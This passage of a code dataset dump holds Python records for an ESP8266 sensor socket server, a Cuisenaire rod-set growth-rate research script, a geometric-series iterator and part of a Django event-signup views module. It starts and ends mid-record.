notified_socket != self.server_socket:\n client_mac = getmac.get_mac_address(ip = notified_socket.getpeername()[0])\n if self.id_dict[client_mac] != 'UPS':\n mess_dict = {'ID':self.id_dict[client_mac]}\n message = receive_message(notified_socket)\n if message is False:\n self.sockets_list.remove(notified_socket)\n continue\n elif message == None:\n continue\n message = message.strip()\n try:\n temp, humid = self.therm_parsing(message)\n mess_dict['Temp'] = temp.decode('utf-8')\n mess_dict['Humid'] = humid.decode('utf-8')\n return_list.append(mess_dict)\n except TypeError:\n return_list = []\n\n return return_list","repo_name":"nguyenmthien/VGUServer_archive","sub_path":"ESP8266/PowerEfficient/socket_server.py","file_name":"socket_server.py","file_ext":"py","file_size_in_byte":4951,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"23544944552","text":"\"\"\"\ncode to explore families of finite rod sets\n\nUsage: uncomment fragments after the line\n### code to execute here\n\nlast modified: 12/31/2021\n\n@author: Ethan Bolker\n\nto do: \n\nRefactor to get remove translations to and from bitstrings. \nRod sets are now specified by lists of rod lengths.\n\nImprove plotroots so that it plots all the circles corresponding to \nthe roots of the minimal polynomial, not just the one for the growth \nrate.\n- problem same as below\n\nAdd to rodsetattributes\n data.shiftpoly({\"shiftpoly\":spolystr})\ncontaining the shift polynomial - that's the\nquotient of the cpoly and the minimal poly.\n- problem: the code in rodsetattributes knows only the\n growth rate, not the factor of the cpoly that's the\n minimal polynomial. If we can't easily figure this\n out here, we might have to do it in findfamilies, when we \n know the minimal polynomial because it's (usually) the\n first one encountered.\n\"\"\"\nimport sys\nimport math\nfrom utilities import *\nfrom multi import multi\nfrom convolve import p2t\nfrom sympy import roots as sroots\nfrom sympy import solve as solve\nfrom sympy import factor as factor\nfrom numpy import *\nimport numpy as np\nimport numpy.polynomial.polynomial as poly\nimport matplotlib.pyplot as plt\n\nfrom itertools import combinations\n\ndef mygcd(mylist):\n if len(mylist) == 1:\n return mylist[0]\n else:\n return math.gcd( mylist[0],mygcd(mylist[1:]))\n\n# zzzzzzzzz\ndef build_recursion_polynomial(spots):\n ''' from input spots = [1,2,2,2,4] build recursion polynomial\n x**3 - 3*x**2 - x**1 - 1\n ''' \n coeffs = build_cuisenaire_poly_coefficients(spots)\n polystr = str(coeffs[0])\n for i in range(1,len(coeffs)-1):\n if coeffs[i] != 0:\n c = coeffs[i]\n if c > 0:\n sign = str('+')\n else:\n sign = str('-') \n polystr += sign + str(abs(c)) + '*x**' + str(i)\n polystr += '+ x**' + str(len(coeffs)-1)\n return polystr\n\n# deprecated\ndef xxxbuild_recursion_polynomial_coeffs(bits):\n ''' from input bit string 1011 build recursion polynomial\n coefficients as list [-1, -1, 0, -1, 1].\n Coefficients from constant term to degree 4.\n '''\n n = len(bits)\n coeffs = [1]\n for j in range(n)[:-1]:\n b = int(bits[j])\n coeffs.append(-b)\n coeffs.append(-1) \n coeffs.reverse()\n return coeffs\n\n# This function is no longer called. The growth rate is\n# the largest root of the Cuisenaire polynomial.\ndef xgrowthrate(d):\n ''' Calculate the growth rate for total solutions\n for the puzzle problem R(d). Here d is the \n bit string specifying which C_k are allowed, \n or that bit string as a plug number, \n or a list [a,b,...] 
of positions of 1 bits.\n The algorithm pads with lots of 0s to stabilize growth.\n Adjusts when gcd of plug lengths > 1.\n '''\n if isinstance(d, str): # d is a bitstring like \"101\"\n xd = bitstring2bits(d)\n elif isinstance(d, int): # convert integer d to binary\n xd = [int(i) for i in bin(d)[2:]]\n elif isinstance(d, list):\n xd = spots2bits(d)\n else:\n print(f\"type error {d}\")\n return\n spots = bits2spots(xd)\n gcd = mygcd(spots)\n spotsum = sum(spots)\n expand = 300\n lookat = expand*gcd\n zeros = 2*lookat\n goodspot = spotsum + lookat - 1\n xd.extend([0]*zeros)\n totals = p2t(xd)\n rate = (totals[goodspot + gcd]/totals[goodspot])**(1/gcd)\n return(rate)\n\ndef growthrate(rods):\n coeffs = build_cuisenaire_poly_coefficients(rods)\n r1 = poly.polyroots(coeffs)\n# maxroot = np.round(np.abs(max(r1)),10)\n maxroot = np.abs(max(r1))\n return maxroot\n \ndef rodsetattributes(input):\n ''' Create dictionary of attributes the input rod set.\n Rod set should really be an object.\n '''\n# if isinstance(input, str): # d is a bitstring like \"101\"\n# bits = input\n# elif isinstance(input, list):\n# bits = spots2bitstring(input)\n# else:\n# print(f\"type error {input}\")\n# return\n data = {}\n mypoly = build_recursion_polynomial(input)\n fpoly = factor(mypoly)\n coeffs = build_cuisenaire_poly_coefficients(input) \n# print(\"xxx mypoly\", mypoly)\n# print(\"xxx fpoly\", fpoly)\n# print(\"xxx\", coeffs)\n r1 = poly.polyroots(coeffs)\n maxroot = np.round(max(np.abs(r1)),10)\n theroots = list(np.round(np.abs(r1),3))\n rootlengths = list(set(theroots)) \n fpolystr = str(fpoly)\n fpolystr = fpolystr.replace(\"**\",\"^\").replace(\"*\",\"\").replace(\"^1 \",\"\").replace(\"1x\",\"x\") \n mypolystr = str(mypoly)\n mypolystr = mypolystr.replace(\"**\",\"^\").replace(\"*\",\"\").replace(\"^1 \",\"\").replace(\"1x\",\"x\").replace(\"^1-\",\"-\")\n# data.update({\"bits\":bits})\n data.update({\"spots\":input})\n data.update({\"growthrate\":maxroot})\n data.update({\"cpoly\":mypolystr})\n data.update({\"factors\":fpolystr})\n# data.update({\"roots\":theroots})\n data.update({\"rootlengths\":rootlengths}) \n return data\n\n# should rewrite this function to call rodsetattributes(input)\ndef csvout(input):\n ''' Print string with data about the input (bit string or rod set)\n suitable for spreadsheet input. 
\n Use '@' rather than a comma as the delimiter.\n '''\n if isinstance(input, str): # d is a bitstring like \"101\"\n bits = input\n elif isinstance(input, list):\n bits = spots2bitstring(input)\n else:\n print(f\"type error {input}\")\n return\n mypoly = build_recursion_polynomial(input)\n fpoly = factor(mypoly)\n coeffs = build_cuisenaire_poly_coefficients(input)\n r1 = poly.polyroots(coeffs)\n maxroot = np.round(np.abs(max(r1)),10)\n theroots = list(np.round(np.abs(r1),3))\n print(f\"{bits}@ {input}@ {maxroot}@ {mypoly}@ {fpoly} @ {theroots}\")\n return\n\ncsvheader=\"d@ spots@ growth rate@ poly@ factored@ |roots|\" \n\ndef growthratecsv(N):\n ''' Print spreadsheet input for odd plug numbers up to 2**N\n and for those numbers with prefixes 0, 00, 000 and 0000\n '''\n print(csvheader)\n for d in range(1, 1+2**N,2):\n todo = [bin(d)[2:], bin(2*d)[2:][::-1], bin(4*d)[2:][::-1],\n bin(8*d)[2:][::-1], bin(16*d)[2:][::-1] \n ]\n for bits in todo:\n csvout(bits)\n return\n\n# from //www.geeksforgeeks.org/itertools-combinations-module-python-print-possible-combinations/\ndef rSubset(arr, r):\n # return list of all subsets of length r\n # to deal with duplicate subsets use \n # set(list(combinations(arr, r)))\n return list(combinations(arr, r))\n\n# This should be refactored to call rodcount(limit, count)\ndef rodcountcsv( limit, count):\n ''' Print spreadsheet input for all cuisenaire rod sets of \n length up to limit using at most count rods\n '''\n# print(f\"count {count} limit {limit}\")\n print(csvheader)\n possibles = list(range(limit+1)[1:])\n counts = list(range(count+1))[1:]\n for j in counts:\n spotsets = rSubset( possibles, j)\n for spots in spotsets:\n csvout(list(spots))\n return \n\n# yyyyyyyyyy\ndef build_cuisenaire_poly_coefficients(rods):\n# degree = rods[len(rods)-1] # last entry\n# degree = max(rods)\n degree = max(max(rods),-min(rods))\n if degree==max(rods):\n globalsign = 1\n else:\n globalsign = -1\n coeffs = [0]*(degree+1)\n for r in rods:\n# print(r, sign(r)) \n# coeffs[degree-abs(r)] += -1\n coeffs[degree-abs(r)] -= sign(r)*globalsign\n# print(r, sign(r))\n coeffs[degree] = 1\n# print(coeffs)\n return coeffs\n\ndef get_cuisenaire_poly_roots(rods):\n coeffs = build_cuisenaire_poly_coefficients(rods)\n return np.array(poly.polyroots(coeffs))\n\ndef plotroots(rods):\n # plot the roots \n data = get_cuisenaire_poly_roots(rods)\n x = data.real\n y = data.imag\n\n # plot the circle through the largest root\n r = growthrate(rods);\n theta = np.linspace(0, 2*np.pi, 100)\n x1 = r*np.cos(theta)\n x2 = r*np.sin(theta)\n\n fig, ax = plt.subplots(1)\n ax.plot(x, y, 'b*')\n plt.xlabel(str(rods))\n ax.plot(x1, x2,'r')\n ax.set_aspect(1)\n plt.xlim(-2,2)\n plt.ylim(-2,2)\n\n plt.show() \n \ndef checkAP(spots, m):\n print(f\"{spots} + {m}k\")\n max = 80\n equiv = spots + list([m])\n equiv.sort()\n long = spots.copy()\n for r in spots:\n nextr = r+m\n while nextr < max:\n long.append(nextr)\n nextr += m\n long.sort()\n print(f\"{long} {growthrate(long)}\")\n print(f\"{equiv} {growthrate(equiv)}\")\n\ndef xfindfamilies( limit, count):\n ''' Collect cuisenaire rod sets of \n length up to limit using at most count rods\n into families keyed by growthrate.\n '''\n families = {} \n# print(f\"count {count} limit {limit}\")\n possibles = list(range(limit+1)[1:])\n counts = list(range(count+1))[1:]\n for j in counts:\n spotsets = rSubset( possibles, j)\n for spots in spotsets:\n if mygcd(spots) > 1:\n break\n attributes = rodsetattributes(list(spots))\n key = attributes.get(\"growthrate\")\n if 
families.get(key) == None:\n families[key] = [list(attributes[\"spots\"])]\n else:\n families[key].append(list(attributes[\"spots\"]))\n return families\n\ndef findfamilies( length, count):\n ''' Collect cuisenaire rod sets of \n length up to length using at most count rods\n into families keyed by growthrate.\n '''\n families = {}\n spotsetattributes = rodcountmultisets(length, count )\n for spots in spotsetattributes:\n \n# if len(spots['bits']) == 1:\n# continue\n key = spots.get(\"growthrate\")\n# print(key)\n if families.get(key) == None:\n# families[key] = spots\n families[key] = []\n families[key].append(spots)\n return families\n\n# zzzzzzzzzz\ndef rodcountmultisets( length, limit):\n ''' Create list of attributes for all cuisenaire rod multisets of \n length up to limit using at most count rods\n '''\n rodcounts = []\n spotsets = multi(length, limit)\n for spots in spotsets:\n if len(spots) == 1:\n continue\n# if mygcd(spots) > 1:\n# continue\n attributes = rodsetattributes(list(spots))\n rodcounts.append(attributes)\n return rodcounts\n\ndef rodcount( limit, count):\n ''' Create list of attributes for all cuisenaire rod sets of \n length up to limit using at most count rods\n '''\n rodcounts = []\n possibles = list(range(limit+1)[1:])\n counts = list(range(count+1))[1:]\n for j in counts:\n spotsets = rSubset( possibles, j)\n for spots in spotsets:\n# if mygcd(spots) > 1:\n# continue\n attributes = rodsetattributes(list(spots))\n rodcounts.append(attributes)\n return rodcounts\n\n\ndef findrodsfor(target, epsilon, rods=None):\n# print(f\"target {target} epsilon {epsilon} start {rods}\")\n if rods is None:\n rods = [1] \n g = growthrate(rods)\n if g > target:\n print(\"target smaller than start\")\n return rods\n while np.abs(target-g) > epsilon:\n while g < target:\n rods.append(rods[-1])\n g = growthrate(rods) \n rods[-1] = 1+rods[-1]\n g = growthrate(rods) \n# print(f\"{rods} {g}\")\n return(rods)\n\ndef findrodsclassicfor(target, epsilon):\n# print(f\"{target} {epsilon}\")\n rods = [1]\n g = growthrate(rods)\n print(f\"{rods} {g}\") \n while np.abs(target-g) > epsilon:\n rods.append(1+rods[-1])\n g = growthrate(rods)\n# print(f\"{rods} {g}\") \n while g > target:\n rods[-1] = 1+rods[-1]\n g = growthrate(rods)\n return(rods)\n\ndef hasduplicates(listOfElems, skipstart= 0):\n ''' Check if given list contains any duplicates \n ignoring first skipstart items\n '''\n return not len(listOfElems[skipstart:]) == len(set(listOfElems[skipstart:]))\n\ndef compareg(rods, extra):\n g = growthrate(rods)\n rods.append(extra)\n gx = growthrate(rods)\n return rods, extra, gx-g\n\ndef buildtree(rods, level):\n ''' find rod sets in the tree build by expanding\n the rods in R by R\n '''\n tree = [[rods]]\n for i in range(level):\n nextlevel =[]\n for rodset in tree[i]:\n for r in rodset:\n next = rodset.copy()\n next.remove(r)\n for s in rods:\n next.append(r+s)\n next.sort()\n nextlevel.append(next)\n tree.append(nextlevel)\n return tree\n\n\ndef commonexpansion(rods1, rods2, depth):\n from itertools import chain \n t1 = buildtree(rods1, depth);\n t2 = buildtree(rods2, depth);\n f1 = list(chain(*t1))\n f2 = list(chain(*t2)) \n return [value for value in f1 if value in f2] \n\ndef cpolyisminimal(rods):\n data = rodsetattributes(rods)\n return not \"(\" in data.get(\"factors\")\n\ndef getrandomrodset(length, candidates):\n rods = length*[0]\n for i in range(length):\n rods[-i] = random.choice(candidates)\n return list(sort(rods))\n\ndef countminimalcpolys(count, length, rodrange):\n ''' find the 
proportion of rod sets with minimal cpoly\n in a random selection of count rod sets of given length\n with elemens chosen from rodrange.\n '''\n minimalcount = 0\n for i in range(count):\n rods = getrandomrodset(length, rodrange)\n# print(i,rods)\n if cpolyisminimal(rods):\n minimalcount += 1\n# else:\n# print(rodsetattributes(rods))\n return minimalcount/count\n \n### code to execute here\nif __name__ == \"__main__\":\n\n## default:\n## Print details about rod set from command line\n \n if len(sys.argv) > 1: \n rodset = list(map(int, sys.argv[1:]))\n print(rodsetattributes( rodset))\n plotroots(rodset)\n\n\n## Print families with at least two members\n# Separator '@' instead of ',' smooths spreadsheet import from\n# csv file that's really now @sv\n# \n# families = findfamilies(3,4)\n# for f in families.values():\n# if len(f) > 2:\n# print(f\"{f[0]['growthrate']}\")\n# for i in range(len(f)):\n# cpoly = str(f[i]['cpoly'])\n# factors = str(f[i]['factors'])\n# print(f\"@{f[i]['spots']}@{cpoly}@{factors}\")\n\n\n##\n# print(\"countminimalcpolys(count=100, length=10, rodrange=range(1,n))\")\n# for n in range(10,100,5):\n# print(n, countminimalcpolys(count=100, length=10, rodrange=range(1,n)))\n# \n # rods = [1,2]\n# print(rods, cpolyisminimal(rods))\n# rods = [1,5]\n# print(rods, cpolyisminimal(rods))\n\n## Print the intersection of the trees from two rod sets\n# print(commonexpansion([1,3,3],[1,3,4,6,6],2))\n\n\n## Print the tree of expansions of a rod set to specified depth \n# rods = [2,3] \n# tree23 = buildtree(rods,3)\n# for level in tree23:\n# print(level)\n\n## Print the growthrate for a rod set\n# print(growthrate([1,3,4]))\n\n## Print the start of infinite rod set for a given growthrate\n# to specified precision with optional beginning\n# rate = growthrate([3,4])\n# eps = 0.0000001\n# print(findrodsfor(rate, eps))\n# print(findrodsfor(rate, eps, rods=[2]))\n# print(findrodsfor(rate, eps, [3])) \n\n######################################################################\n# \n# Only special purpose code from here on\n# \n# print(f\"{growthrate([1,10,20])}\")\n# print(f\"{growthrate([1,10,10,20])}\") \n# print(compareg([1,10,20], 10)) \n\n# check to see if we ever get nonclassic rod sets\n# start = 1.1\n# step = 0.001\n# epsilon = 0.00000001\n# count = 10\n# for i in range(count):\n# rate = start + i*step\n# rods = findrodsfor(rate, epsilon)\n# print(rods)\n# if hasduplicates(rods):\n# print(rate, rods)\n\n# eps = 0.00000001\n# rate = 1.6\n# print(findrodsfor(rate, eps))\n# print(findrodsfor(rate, eps, rods=[2]))\n# print(findrodsfor(rate, eps, rods=[3]))\n# print(findrodsfor(rate, eps, rods=[4]))\n# print(findrodsfor(rate, eps, rods=[2,5])) \n \n# print(hasduplicates([1,2,3]))\n# print(hasduplicates([1,2,2])) \n# print(findrodsfor(rate, eps,[2])) \n# print(findrodsfor(rate, eps,[3]))\n# print(findrodsfor(rate, eps,[4])) \n# print(findrodsclassicfor(rate,eps))\n\n \n# rods=[1]\n# for j in range(100):\n# rods.append\n# print(f\"{growthrate(rods)}\")\n\n \n# findrodsfor(3.5, 0.00000001)\n# findrodsfor(sqrt(2), 0.00000001)\n\n# families = findfamilies(2,50)\n# for f in families.values():\n# if len(f) > 1:\n# print()\n\n# put families into latex table\n# families = findfamilies(6,10)\n# for f in families.values():\n# if len(f) > 4:\n# print()\n# print(\"\\\\documentclass{standalone}\")\n# print(\"\\\\begin{document}\")\n# print()\n# print(\"\\\\begin{tabular}{llllllllllllllllllll}\")\n# allspots = list(f[i]['spots'] for i in range(len(f)))\n# allspots.sort(key=max)\n# allspots.sort(key=len) 
\n# row = len(allspots[0])\n# count = 0 \n# for spots in allspots:\n# if row != len(spots):\n# print(\" \\\\\\\\\")\n# print(\" \\\\\\\\\")\n# print(\" \\\\\\\\\")\n# print(\" \\\\\\\\\") \n# row = len(spots)\n# count = 0\n# if count > 7:\n# print(\" \\\\\\\\\")\n# print(\" \\\\\\\\\") \n# print(\"\", end=\"\")\n# count = 0\n# count += 1\n# print(\"$\"+str(spots).replace(\" \",\"\"), end=\"$ & \")\n# print()\n# print(\"\\\\end{tabular}\")\n# print(\"\\\\end{document}\") \n# testing sorting\n# ll = [[1, 6, 10],[1, 7, 8],[2, 4, 8],[2, 5, 6],[3, 3, 7],[3, 4, 5]]\n# print(ll)\n# ll.sort()\n# print(ll) \n# ll.sort(key=max)\n# print(ll) \n\n# families = findfamilies(3,3)\n# for f in families.values():\n# if len(f) > 1:\n# print(f\"{f[0]['growthrate']}\")\n# for i in range(len(f)):\n# cpoly = str(f[i]['cpoly']).replace(\"**\",\"^\")\n# cpoly = cpoly.replace(\"*\",\"\")\n# cpoly = cpoly.replace(\"^1\",\"\") \n# factors = str(f[i]['factors']).replace(\"**\",\"^\")\n# factors = factors.replace(\"*\",\"\")\n# factors = factors.replace(\"^1\",\"\") \n# print(f\"@{f[i]['spots']}@{cpoly}@{factors}\")\n\n\n# print\n\n# csvout([1,3])\n# csvout([3,5,5,5,6,7,7])\n# csvout([1,2,2,2,4])\n# print(rodsetattributes([1,2,2,2,4]))\n# csvout([1,3,4])\n# print(rodsetattributes([1,3,4]))\n \n# find all rod sets of length 2, extract growthrate and rods for excel\n# data = rodcount(40,2)\n# for spots in data:\n# if len(spots[\"spots\"]) == 2:\n# print(f\"{spots['spots']}@{spots['spots'][0]}@{spots['spots'][1]}@ {spots['growthrate']} \")\n \n","repo_name":"ktllee/plug_problem","sub_path":"cuisenaire/Ethan/cuisenaire.py","file_name":"cuisenaire.py","file_ext":"py","file_size_in_byte":19524,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"18323926243","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @File : 等比数列.py\n# @Author: Lizi\n# @Date : 2020/12/23\n\n\nclass Geometric_series_based_iterator:\n def __init__(self, first=0, step=1, sequence_count=10):\n self._first = first\n self._step = step\n self._sequence_counter = sequence_count\n self._index = 0\n\n def __iter__(self):\n return self\n\n def __next__(self):\n if self._index < self._sequence_counter:\n res = self._first * (self._step ** self._index)\n self._index += 1\n return res\n else:\n raise StopIteration\n\n\ndef geometric_series_based_generator(first=0, step=1, sequence_count=10):\n \"\"\"基生生成器函数的等差数列,与上面的代码功能完全相同\"\"\"\n for index in range(0, sequence_count):\n res = first * step ** index\n yield res\n index += 1\n\n\nif __name__ == '__main__':\n interator = Geometric_series_based_iterator(first=1, step=2, sequence_count=10)\n print(\"基于迭代器的等比数列的结果:\")\n for num in interator:\n print(num, end=' ')\n\n print(' ')\n\n generator = geometric_series_based_generator(first=1, step=2, sequence_count=10)\n print(\"基于生成器的等比数列的结果:\")\n for num in generator:\n print(num, end=' ')\n","repo_name":"rage-vampire/Python","sub_path":"lizi_project/built_in_function/iter+generaotr/等比数列.py","file_name":"等比数列.py","file_ext":"py","file_size_in_byte":1328,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
+{"seq_id":"74453147369","text":"import calendar\nimport csv\n\nfrom collections import defaultdict\nfrom datetime import timedelta, datetime\nfrom dateutil import tz\nfrom urllib.parse import urlencode\n\nfrom django.conf import settings\nfrom django.contrib.auth import get_user_model\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib import messages\nfrom django.core import signing\nfrom django.db import IntegrityError\nfrom django.http import JsonResponse, HttpResponse\nfrom django.shortcuts import render, get_object_or_404, redirect\nfrom django.utils.html import strip_tags\nfrom django.utils.http import http_date\nfrom django.utils.timezone import now\nfrom django.urls import reverse\nfrom django.views.decorators.cache import never_cache, cache_page\nfrom django.utils.decorators import method_decorator\nfrom django.views.decorators.csrf import csrf_protect\n\nfrom django import forms\nfrom phonenumber_field.formfields import PhoneNumberField\n\nfrom extinctionr.utils import get_last_contact, set_last_contact, get_contact\nfrom .models import Action, ActionRole, Attendee, TalkProposal\nfrom .comm import notify_commitments\n\n\nBOOTSTRAP_ATTRS = {'class': 'form-control text-center'}\n\nclass ActionForm(forms.ModelForm):\n class Meta:\n model = Action\n fields = ('name', 'when', 'description', 'public', 'location', 'tags', 'slug', 'accessibility')\n\n\nclass SignupForm(forms.Form):\n email = forms.EmailField(label=\"Email\", required=True, widget=forms.EmailInput(attrs={'class': 'form-control text-center', 'placeholder': 'Email Address'}))\n name = forms.CharField(label=\"Your name\", widget=forms.TextInput(attrs={'class': 'form-control text-center', 'placeholder': 'Your Name'}))\n promised = forms.BooleanField(required=False, widget=forms.CheckboxInput(attrs={'class': 'form-check'}))\n role = forms.ModelChoiceField(queryset=None, required=False, widget=forms.Select(attrs=BOOTSTRAP_ATTRS))\n next = forms.CharField(required=False, widget=forms.HiddenInput())\n notes = forms.CharField(required=False, initial='')\n commit = forms.IntegerField(required=False, initial=0, widget=forms.NumberInput(attrs={'class': 'form-control text-center', 'min': 0, 'max': 1000}))\n\n def __init__(self, *args, **kwargs):\n self.action = kwargs.pop('action')\n super().__init__(*args, **kwargs)\n self.fields['role'].queryset = qset = ActionRole.objects.filter(name__in=self.action.available_role_choices)\n if qset:\n self.fields['role'].required = True\n\n\nclass TalkProposalForm(forms.Form):\n location = forms.CharField(widget=forms.Textarea(attrs={'rows': 4, 'class': 'form-control', 'placeholder': 'Your location'}))\n name = forms.CharField(label=\"Your name\", required=True, widget=forms.TextInput(attrs={'class': 'form-control text-center', 'placeholder': 'Your Name'}))\n email = forms.EmailField(label=\"Email\", required=True, widget=forms.EmailInput(attrs={'class': 'form-control text-center', 'placeholder': 'Email Address'}))\n phone = PhoneNumberField(label=\"Phone Number\", required=False, widget=forms.TextInput(attrs={'class': 'form-control text-center', 'placeholder': 'Phone Number'}))\n\n\ndef _get_actions(request, whatever='', include_future=True, include_past=7):\n token = request.GET.get('token', '')\n req_date = request.GET.get('month','')\n tag_filter = request.GET.get('tag', '')\n context = {}\n today = now().date()\n current_date = today.replace(day=1)\n if token:\n try:\n user_id = signing.Signer().unsign(token)\n except signing.BadSignature:\n return 
HttpResponse(status=403)\n else:\n user = get_user_model().objects.get(pk=user_id)\n else:\n user = request.user\n actions = Action.objects.for_user(user)\n if whatever.isdigit():\n actions = actions.filter(pk=int(whatever))\n else:\n if req_date:\n current_date = datetime.strptime(req_date, '%Y-%m')\n context['is_cal'] = True\n start_date = current_date - timedelta(days=include_past)\n if not include_future:\n end_date = start_date + timedelta(days=38)\n else:\n end_date = start_date + timedelta(days=3650)\n actions = actions.filter(when__date__range=(start_date, end_date))\n if tag_filter:\n actions = actions.filter(tags__name=tag_filter)\n context['current_tag'] = tag_filter\n context['is_cal'] = True\n context['current_date'] = current_date\n context['today'] = today\n return actions, context\n\n\ndef calendar_view(request, whatever):\n from ics import Calendar, Event\n actions, ctx = _get_actions(request, include_future=True, include_past=30)\n thecal = Calendar()\n thecal.creator = 'XR Mass Events'\n for action in actions:\n evt = Event()\n evt.uid = '{}@{}'.format(action.id, request.get_host())\n evt.name = action.html_title\n evt.description = action.description\n evt.categories = action.tags.names()\n evt.last_modified = action.modified\n evt.url = request.build_absolute_uri(action.get_absolute_url())\n evt.begin = action.when\n evt.duration = timedelta(hours=1)\n # evt.end = action.when + timedelta(hours=1)\n evt.location = action.location\n thecal.events.add(evt)\n response = HttpResponse(thecal, content_type='text/calendar')\n return response\n\n\n@cache_page(1200)\n@csrf_protect\ndef list_actions(request):\n can_add = request.user.has_perm('actions.add_action')\n if request.method == 'POST' and can_add:\n form = ActionForm(request.POST)\n if form.is_valid():\n action = form.save()\n return redirect(action.get_absolute_url())\n else:\n print(form.errors)\n\n qset, ctx = _get_actions(request, include_future=False)\n if not ctx.get('is_cal'):\n actions = Action.objects.for_user(request.user).filter(when__gte=now())\n ctx['upcoming'] = actions[:6]\n else:\n actions = None\n current_date = ctx['current_date']\n ctx['next_month'] = current_date + timedelta(days=31)\n ctx['last_month'] = current_date + timedelta(days=-1)\n\n cal_days = list(calendar.Calendar(firstweekday=6).itermonthdates(current_date.year, current_date.month))\n this_month = []\n this_week = []\n month_actions = defaultdict(list)\n\n for action in qset:\n # Convert day to local day so actions land in the right day for current view.\n day = action.when.astimezone(tz.tzlocal()).date()\n month_actions[day].append(action)\n\n event_colors = {\n 'talk': 'xr-bg-pink',\n 'action': 'xr-bg-green',\n 'ally': 'xr-bg-light-green',\n 'meeting': 'xr-bg-lemon',\n 'orientation': 'xr-bg-purple',\n 'art': 'xr-bg-warm-yellow',\n 'nvda': 'xr-bg-light-blue',\n 'regen': 'xr-warm-yellow xr-bg-dark-blue',\n }\n for daynum, mdate in enumerate(cal_days, 1):\n todays_actions = month_actions[mdate]\n obj = {\n 'day': mdate,\n 'events': todays_actions,\n 'bg': '',\n }\n if mdate.month == current_date.month:\n for a in todays_actions:\n tagnames = a.tags.names()\n for t in a.tags.names():\n color = event_colors.get(t, None)\n if color:\n obj['bg'] = color\n break\n else:\n # previous month\n obj['bg'] = 'bg-light'\n if mdate == ctx['today']:\n obj['today'] = True\n this_week.append(obj)\n if daynum % 7 == 0:\n this_month.append(this_week)\n this_week = []\n if this_week:\n this_month.append(this_week)\n ctx['month'] = this_month\n ctx['can_add'] 
= can_add\n if ctx['can_add']:\n ctx['form'] = ActionForm()\n calendar_link = 'webcal://{}/action/ical/XR%20Mass%20Events'.format(request.get_host())\n link_pars = {}\n if request.user.is_authenticated:\n link_pars['token'] = signing.Signer().sign(request.user.id)\n if ctx.get('current_tag'):\n link_pars['tag'] = ctx.get('current_tag')\n ctx['calendar_link'] = calendar_link + '?' + urlencode(link_pars)\n resp = render(request, 'list_actions.html', ctx)\n resp['Vary'] = 'Cookie'\n\n if request.user.is_authenticated:\n resp['Cache-Control'] = 'private'\n if actions:\n resp['Last-Modified'] = http_date(actions.last().when.timestamp())\n return resp\n\n\n\n@cache_page(1200)\ndef show_action(request, slug):\n action = get_object_or_404(Action, slug=slug)\n ctx = {'action': action}\n if request.user.is_authenticated:\n ctx['attendees'] = Attendee.objects.filter(action=action).select_related('contact').order_by('-mutual_commitment', '-promised', 'pk')\n ctx['promised'] = ctx['attendees'].filter(promised__isnull=False)\n ctx['default_to_email'] = settings.DEFAULT_FROM_EMAIL\n if action.when < now() and action.public:\n # don't allow signups for public actions that already happened\n ctx['already_happened'] = True\n form = None\n elif request.method == 'POST':\n form = SignupForm(request.POST, action=action)\n if form.is_valid():\n data = form.cleaned_data\n commit = abs(data['commit'] or 0)\n atten = action.signup(data['email'],\n data['role'],\n name=data['name'][:100],\n promised=data['promised'],\n commit=commit,\n notes=data['notes'])\n next_url = data['next'] or request.headers.get('referer', '/')\n messages.success(request, \"Thank you for signing up for {}!\".format(action.html_title))\n if commit:\n messages.info(request, \"We will notify you once at least %d others commit\" % commit)\n set_last_contact(request, atten.contact)\n return redirect(next_url)\n else:\n contact = get_contact(email=request.user.email) if request.user.is_authenticated else get_last_contact(request)\n initial = {}\n if contact:\n initial['email'] = contact.email\n initial['name'] = str(contact)\n form = SignupForm(action=action, initial=initial)\n ctx['form'] = form\n ctx['has_roles'] = list(action.available_role_choices)\n ctx['photos'] = list(action.photos.all())\n resp = render(request, 'action.html', ctx)\n resp['Vary'] = 'Cookie'\n resp['Last-Modified'] = http_date(action.modified.timestamp())\n if request.user.is_authenticated:\n resp['Cache-Control'] = 'private'\n return resp\n\n\n@never_cache\ndef show_attendees(request, action_slug):\n action = get_object_or_404(Action, slug=action_slug)\n out_fmt = request.GET.get('fmt', 'json')\n attendees = Attendee.objects.filter(action=action).select_related('contact').order_by('contact__last_name')\n num = attendees.count()\n if num > 10:\n half = int(num / 2)\n else:\n half = None\n if out_fmt == 'html':\n resp = HttpResponse('not allowed')\n\n # ctx = {'attendees': attendees, 'half': half, 'can_change': request.user.is_staff, 'slug': action_slug}\n # resp = render(request, 'attendees.html', ctx)\n elif out_fmt == 'csv' and request.user.has_perm('actions.view_attendee'):\n attendees = attendees.order_by('created')\n resp = HttpResponse()\n resp['Content-Type'] = 'text/csv'\n csv_writer = csv.writer(resp)\n header = ('Email', 'First Name', 'Last Name', 'Phone', 'Promised', 'Created')\n csv_writer.writerow(header)\n for attendee in attendees:\n csv_writer.writerow((attendee.contact.email, attendee.contact.first_name, attendee.contact.last_name, attendee.contact.phone, 
attendee.promised, attendee.created.isoformat()))\n return resp\n\n\n@login_required\ndef send_notifications(request, action_slug):\n action = get_object_or_404(Action, slug=action_slug)\n if request.method == 'POST':\n threshold = int(request.POST['threshold'])\n action_url = request.build_absolute_uri(reverse('actions:action', kwargs={'slug': action_slug}))\n num = notify_commitments(action, threshold, action_url)\n if num:\n messages.success(request, 'Notified %d attendees of their commitment!' % num)\n return redirect(action.get_absolute_url())\n\n\ndef propose_talk(request):\n ctx = {}\n if request.method == 'POST':\n form = TalkProposalForm(request.POST)\n if form.is_valid():\n data = form.cleaned_data\n prop = TalkProposal.objects.propose(\n strip_tags(data['location']),\n data['email'],\n phone=data['phone'],\n name=data['name'])\n ctx['created'] = prop\n messages.success(request, 'Thank you, {}!'.format(prop.requestor))\n messages.info(request, 'Somebody from Extinction Rebellion will contact you soon to arrange a talk at {}'.format(prop.location))\n set_last_contact(request, prop.requestor)\n return redirect(reverse('extinctionr.actions:talk-proposal'))\n else:\n contact = get_last_contact(request)\n initial = {}\n if contact:\n initial['email'] = contact.email\n initial['name'] = str(contact)\n initial['phone'] = contact.phone\n form = TalkProposalForm(initial=initial)\n ctx['form'] = form\n return render(request, 'talkproposal.html', ctx)\n\n\n@login_required\ndef 